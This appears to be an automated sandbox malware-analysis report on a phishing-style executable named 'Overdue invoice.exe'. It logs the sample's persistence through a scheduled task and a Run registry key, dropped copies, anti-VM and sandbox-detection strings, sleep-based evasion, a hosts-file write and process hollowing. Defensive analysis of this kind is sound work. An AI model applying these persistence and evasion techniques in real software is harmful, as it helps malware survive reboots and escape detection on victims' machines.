                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_027366AD push FFFFFF8Bh; iretd 0_2_027366AF
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 0_2_07263D82 push esi; retf 0_2_07263D98
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016D5170 push es; ret 7_2_016D5188
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_016D5150 push es; ret 7_2_016D5168
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE5D push es; retf 7_2_064EAE84
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE1E push es; retf 7_2_064EAE20
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE1A push es; retf 7_2_064EAE1C
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE16 push es; retf 7_2_064EAE18
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE2E push es; retf 7_2_064EAE30
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE2A push es; retf 7_2_064EAE2C
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE26 push es; retf 7_2_064EAE28
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE22 push es; retf 7_2_064EAE24
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE3A push es; retf 7_2_064EAE3C
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE36 push es; retf 7_2_064EAE38
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAE32 push es; retf 7_2_064EAE34
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAC41 push es; retf 7_2_064EACBC
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EACBE push es; retf 7_2_064EAD54
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAD56 push es; retf 7_2_064EAE14
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EBA60 push es; ret 7_2_064EBA70
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064EAA09 push es; retf 7_2_064EAC24
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_064E3139 push es; iretd 7_2_064E313C
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C697CB push ss; ret 7_2_06C697D2
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C617E9 push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C69783 push ss; ret 7_2_06C697CA
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C61789 push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C6177F push es; ret 7_2_06C618C4
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C6977B push ss; ret 7_2_06C69782
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C69778 push ss; ret 7_2_06C6977A
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C63330 push es; iretd 7_2_06C641D0
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C618CB push es; ret 7_2_06C61910
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Code function: 7_2_06C618AF push es; ret 7_2_06C61910
                    Source: initial sample | Static PE information: section name: .text entropy: 7.65168574947
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File created: C:\Users\user\AppData\Roaming\dYXeRswtYBrq.exe

                    Boot Survival

                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Registry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run yqWDN

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File opened: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe:Zone.Identifier read attributes | delete
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Registry key monitored for changes: HKEY_CURRENT_USER_Classes
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: Overdue invoice.exe PID: 6504, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 5496, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: yqWDN.exe PID: 7048, type: MEMORYSTR
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: WINE_GET_UNIX_FILE_NAME
                    Source: Overdue invoice.exe, 00000000.00000002.298765029.000000000294E000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 0000000F.00000002.373514445.0000000002CFE000.00000004.00000800.00020000.00000000.sdmp, yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6536 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 4264 | Thread sleep time: -13835058055282155s >= -30000s
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276 | Thread sleep count: 4378 > 30
                    Source: C:\Users\user\Desktop\Overdue invoice.exe TID: 6276 | Thread sleep count: 4299 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7128 | Thread sleep time: -20291418481080494s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020 | Thread sleep count: 3465 > 30
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe TID: 7020 | Thread sleep count: 5329 > 30
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Last function: Thread delayed
                    Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Window / User API: threadDelayed 4378
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Window / User API: threadDelayed 4299
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Window / User API: threadDelayed 3465
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Window / User API: threadDelayed 5329
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process information queried: ProcessInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Thread delayed: delay time: 922337203685477
                    Source: yqWDN.exe, 0000000F.00000002.371657286.0000000000E62000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\DosDevices\D:
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware SVGA II
                    Source: yqWDN.exe, 00000010.00000002.371254858.0000000002F2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
                    Source: Overdue invoice.exe, 00000007.00000002.521324973.0000000001715000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Overdue invoice.exe | File written: C:\Windows\System32\drivers\etc\hosts
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Memory written: C:\Users\user\Desktop\Overdue invoice.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Memory written: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmpA306.tmp
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Process created: C:\Users\user\Desktop\Overdue invoice.exe {path}
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dYXeRswtYBrq" /XML "C:\Users\user\AppData\Local\Temp\tmp2055.tmp
                    Source: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe | Process created: C:\Users\user\AppData\Roaming\yqWDN\yqWDN.exe {path}
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Users\user\Desktop\Overdue invoice.exe VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
                    Source: C:\Users\user\Desktop\Overdue invoice.exe | Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
